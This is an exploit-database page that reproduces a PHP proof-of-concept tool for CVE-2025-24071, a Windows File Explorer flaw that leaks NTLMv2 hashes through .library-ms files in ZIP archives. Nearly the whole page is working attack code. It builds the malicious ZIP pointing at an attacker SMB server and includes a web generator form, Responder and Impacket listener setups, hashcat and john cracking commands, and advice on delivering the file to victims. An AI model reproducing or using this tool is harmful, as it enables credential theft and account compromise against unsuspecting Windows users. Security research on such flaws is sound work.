Vulners
Lucene search
📄 Microsoft Windows File Explorer NTLM Hash Disclosure
10
=============================================================================================================================================
| # Title : Windows File Explorer NTLM v2 Hash Disclosure
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64
bits) |
| # Vendor : System built‑in component.No standalone download available
|
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/197740/ &
CVE-2025-24071
[+] Summary :
Windows File Explorer in Windows 10 and 11 contains a critical
NTLM hash disclosure vulnerability that allows attackers to capture user
authentication
credentials by exploiting the automatic parsing of .library-ms files from
ZIP archives, leading to potential domain compromise through credential
relay attacks.
The vulnerability exists in Windows Explorer's automatic handling of
.library-ms files extracted from ZIP archives. When a user extracts a
malicious ZIP file,
Explorer automatically attempts to connect to SMB shares specified in the
.library-ms file, leaking NTLMv2 hashes to attacker-controlled servers
without user interaction.
[+] POC :
php poc.php
<?php
class WindowsNTLMHashDisclosure {
private $ip;
private $filename;
private $output_dir;
private $keep_files;
public function __construct($ip, $filename = 'malicious', $output_dir =
'output', $keep_files = false) {
$this->ip = $ip;
$this->filename = $filename;
$this->output_dir = rtrim($output_dir, '/');
$this->keep_files = $keep_files;
}
public function banner() {
echo "==================================================\n";
echo " Windows File Explorer NTLM Hash Disclosure\n";
echo " CVE-2025-24071 Exploit Tool\n";
echo " Author: indoushka (PHP Port)\n";
echo "==================================================\n\n";
}
public function create_library_ms() {
$payload = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library
">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{$this->ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
XML;
$library_file = $this->output_dir . '/' . $this->filename .
'.library-ms';
if (!file_put_contents($library_file, $payload)) {
throw new Exception("Failed to create .library-ms file");
}
echo "[+] Created malicious .library-ms file: {$library_file}\n";
return $library_file;
}
public function build_zip($library_file) {
$zip_file = $this->output_dir . '/' . $this->filename . '.zip';
$zip = new ZipArchive();
if ($zip->open($zip_file, ZipArchive::CREATE |
ZipArchive::OVERWRITE) !== TRUE) {
throw new Exception("Cannot create ZIP file: {$zip_file}");
}
$zip->addFile($library_file, basename($library_file));
$zip->close();
echo "[+] Created ZIP archive: {$zip_file}\n";
return $zip_file;
}
public function exploit() {
$this->banner();
echo "[*] Target SMB Server: {$this->ip}\n";
echo "[*] Output Directory: {$this->output_dir}\n";
echo "[*] Base Filename: {$this->filename}\n\n";
// Create output directory
if (!is_dir($this->output_dir)) {
if (!mkdir($this->output_dir, 0755, true)) {
throw new Exception("Failed to create output directory:
{$this->output_dir}");
}
}
// Create malicious .library-ms file
$library_file = $this->create_library_ms();
// Package into ZIP
$zip_file = $this->build_zip($library_file);
// Clean up if not keeping files
if (!$this->keep_files && file_exists($library_file)) {
unlink($library_file);
echo "[-] Removed intermediate .library-ms file\n";
}
$this->display_instructions($zip_file);
return $zip_file;
}
private function display_instructions($zip_file) {
echo "\n" . str_repeat("=", 60) . "\n";
echo " EXPLOITATION INSTRUCTIONS\n";
echo str_repeat("=", 60) . "\n";
echo "1. Start SMB listener on {$this->ip}:\n";
echo " - Using Responder: responder -I eth0 -wrf\n";
echo " - Using Impacket: smbserver.py SHARE /tmp/smb
-smb2support\n";
echo "\n2. Deliver ZIP file to victim:\n";
echo " - File: {$zip_file}\n";
echo " - Methods: Email, USB, Network share, etc.\n";
echo "\n3. When victim extracts ZIP, Windows Explorer will:\n";
echo " - Automatically parse .library-ms file\n";
echo " - Attempt SMB connection to {$this->ip}\n";
echo " - Leak NTLMv2 hash to your SMB server\n";
echo "\n4. Crack the captured hash:\n";
echo " - Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\n";
echo " - Use john: john --format=netntlmv2 hash.txt\n";
echo str_repeat("=", 60) . "\n";
}
public static function is_valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}
public function get_file_paths() {
return [
'library_ms' => $this->output_dir . '/' . $this->filename .
'.library-ms',
'zip' => $this->output_dir . '/' . $this->filename . '.zip'
];
}
}
class SMBListenerHelper {
public static function generate_responder_config($ip) {
$config = <<<CONFIG
; Responder Configuration for CVE-2025-24071
; Save as responder.conf
[Responder Core]
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
; Network interface
Interface = eth0
; Specific IP to listen on
BindIP = {$ip}
; Analysis mode (optional)
Analyze = On
CONFIG;
return $config;
}
public static function generate_smbserver_script() {
$script = <<<PYTHON
#!/usr/bin/env python3
# Impacket SMB Server for CVE-2025-24071
from impacket import smbserver
from impacket.ntlm import compute_lmhash, compute_nthash
import argparse
import threading
import sys
class CVE202524071Server:
def __init__(self, listen_address, share_path):
self.server = smbserver.SimpleSMBServer(listen_address,
listen_address, 445)
self.server.addShare("SHARE", share_path)
def start(self):
print("[*] Starting SMB server for CVE-2025-24071")
print("[*] Waiting for NTLM hash leakage...")
self.server.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", required=True, help="IP to listen on")
parser.add_argument("--share", default="/tmp/smb", help="Share path")
args = parser.parse_args()
server = CVE202524071Server(args.ip, args.share)
server.start()
PYTHON;
return $script;
}
}
class HashCrackingHelper {
public static function display_cracking_commands($hash_file =
'captured_hashes.txt') {
$commands = [
'hashcat' => "hashcat -m 5600 {$hash_file}
/usr/share/wordlists/rockyou.txt",
'john' => "john --format=netntlmv2 {$hash_file}",
'online_crack' => "Use online services like crackstation.net or
hashes.com"
];
echo "\n" . str_repeat("=", 50) . "\n";
echo " HASH CRACKING COMMANDS\n";
echo str_repeat("=", 50) . "\n";
foreach ($commands as $tool => $command) {
echo "{$tool}: {$command}\n";
}
echo str_repeat("=", 50) . "\n";
}
public static function generate_hash_example() {
$example = <<<HASH
Example NTLMv2 Hash Format:
username::domain:challenge:HMAC-MD5:blob
Actual captured hash will look like:
Administrator::WIN11:1122334455667788:8846F7EAEE8FB117AD06BDD830B7586C:01010000000000000090D336F74CD801B8B5E9545C96D79F000000000200080053004D004200330001001E00570049004E002D0034004300520038004100330056004A0037004B00420004003400570049004E002D0034004300520038004100330056004A0037004B0042002E0053004D00420033002E004C004F00430041004C000300140053004D00420033002E004C004F00430041004C000500140053004D00420033002E004C004F00430041004C00070008000090D336F74CD8010600040002000000080030003000000000000000010000000020000006DE67E84DC5A62919F4D6F6A8F6F6D6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D6F6A6D0A001000000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E003100300030000000000000000000
HASH;
return $example;
}
}
// Command line interface
if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) ===
basename(__FILE__)) {
if ($argc < 2) {
echo "Windows File Explorer NTLM Hash Disclosure
(CVE-2025-24071)\n";
echo
"===========================================================\n";
echo "Usage: php " . $argv[0] . " <attacker_ip> [options]\n";
echo "Example: php " . $argv[0] . " 192.168.1.100\n";
echo "Example: php " . $argv[0] . " 192.168.1.100 -n payroll -o
./malicious_zips --keep\n";
echo "\nOptions:\n";
echo " -n, --name Base filename (default: malicious)\n";
echo " -o, --output Output directory (default: ./output)\n";
echo " -k, --keep Keep .library-ms file after ZIP creation\n";
echo " --smb-help Show SMB listener setup help\n";
echo " --crack-help Show hash cracking instructions\n";
exit(1);
}
$ip = $argv[1];
$filename = 'malicious';
$output_dir = 'output';
$keep_files = false;
// Parse command line options
for ($i = 2; $i < $argc; $i++) {
switch ($argv[$i]) {
case '-n':
case '--name':
$filename = $argv[++$i];
break;
case '-o':
case '--output':
$output_dir = $argv[++$i];
break;
case '-k':
case '--keep':
$keep_files = true;
break;
case '--smb-help':
echo
SMBListenerHelper::generate_responder_config('192.168.1.100');
echo "\n\n";
echo SMBListenerHelper::generate_smbserver_script();
exit(0);
case '--crack-help':
HashCrackingHelper::display_cracking_commands();
echo "\n" . HashCrackingHelper::generate_hash_example() .
"\n";
exit(0);
}
}
try {
if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {
echo "[-] Invalid IP address: {$ip}\n";
exit(1);
}
$exploit = new WindowsNTLMHashDisclosure($ip, $filename,
$output_dir, $keep_files);
$zip_file = $exploit->exploit();
echo "\n[+] Exploit files created successfully!\n";
echo "[+] Deliver this file to the victim: {$zip_file}\n";
} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
exit(1);
}
}
// Web interface for the exploit
if (isset($_GET['web']) && $_GET['web'] === 'true') {
?>
<!DOCTYPE html>
<html>
<head>
<title>CVE-2025-24071 - NTLM Hash Disclosure</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px;
background: #f0f0f0; }
.container { max-width: 900px; margin: 0 auto; background:
white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px
rgba(0,0,0,0.1); }
h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f;
padding-bottom: 10px; }
.form-group { margin: 20px 0; }
label { display: block; margin-bottom: 5px; font-weight: bold;
color: #333; }
input[type="text"] { padding: 10px; width: 300px; border: 1px
solid #ddd; border-radius: 4px; }
button { background: #d32f2f; color: white; padding: 12px 25px;
border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
button:hover { background: #b71c1c; }
.output { background: #f8f8f8; padding: 15px; border-radius:
4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }
.success { color: #388e3c; font-weight: bold; }
.error { color: #d32f2f; font-weight: bold; }
.info-box { background: #e3f2fd; padding: 15px; border-radius:
4px; margin: 15px 0; }
</style>
</head>
<body>
<div class="container">
<h1>CVE-2025-24071 - Windows NTLM Hash Disclosure</h1>
<?php
if ($_POST['generate'] ?? false) {
$ip = $_POST['ip'] ?? '';
$filename = $_POST['filename'] ?? 'malicious';
$keep_files = isset($_POST['keep_files']);
if (!empty($ip)) {
echo '<div class="output">';
try {
$exploit = new WindowsNTLMHashDisclosure($ip,
$filename, 'web_output', $keep_files);
$zip_file = $exploit->exploit();
$file_paths = $exploit->get_file_paths();
if (file_exists($file_paths['zip'])) {
$file_url = 'web_output/' .
basename($file_paths['zip']);
echo '<p class="success">ZIP file generated
successfully!</p>';
echo '<p><a href="' . $file_url . '"
download>Download Malicious ZIP File</a></p>';
}
} catch (Exception $e) {
echo '<p class="error">Error: ' . $e->getMessage()
. '</p>';
}
echo '</div>';
}
}
?>
<form method="post">
<div class="form-group">
<label for="ip">Your SMB Server IP:</label>
<input type="text" id="ip" name="ip"
placeholder="192.168.1.100" required>
</div>
<div class="form-group">
<label for="filename">ZIP Filename:</label>
<input type="text" id="filename" name="filename"
value="malicious">
</div>
<div class="form-group">
<label>
<input type="checkbox" name="keep_files" value="1">
Keep .library-ms file (for analysis)
</label>
</div>
<button type="submit" name="generate">Generate Malicious
ZIP</button>
</form>
<div class="info-box">
<h3>About CVE-2025-24071:</h3>
<p>This vulnerability affects Windows File Explorer in
Windows 10/11. When a user extracts a ZIP file containing a malicious
.library-ms file, Windows Explorer automatically attempts to connect to an
SMB server specified in the file, leaking the user's NTLMv2 hash.</p>
<h3>Exploitation Steps:</h3>
<ol>
<li>Set up SMB listener on your server</li>
<li>Generate malicious ZIP using this tool</li>
<li>Deliver ZIP to target user</li>
<li>Capture NTLM hash when they extract the file</li>
<li>Crack the hash to obtain credentials</li>
</ol>
<p><strong>Note:</strong> This tool is for educational and
authorized testing purposes only.</p>
</div>
</div>
</body>
</html>
<?php
exit;
}
?>
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Dec 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.16.5
EPSS0.74072
SSVC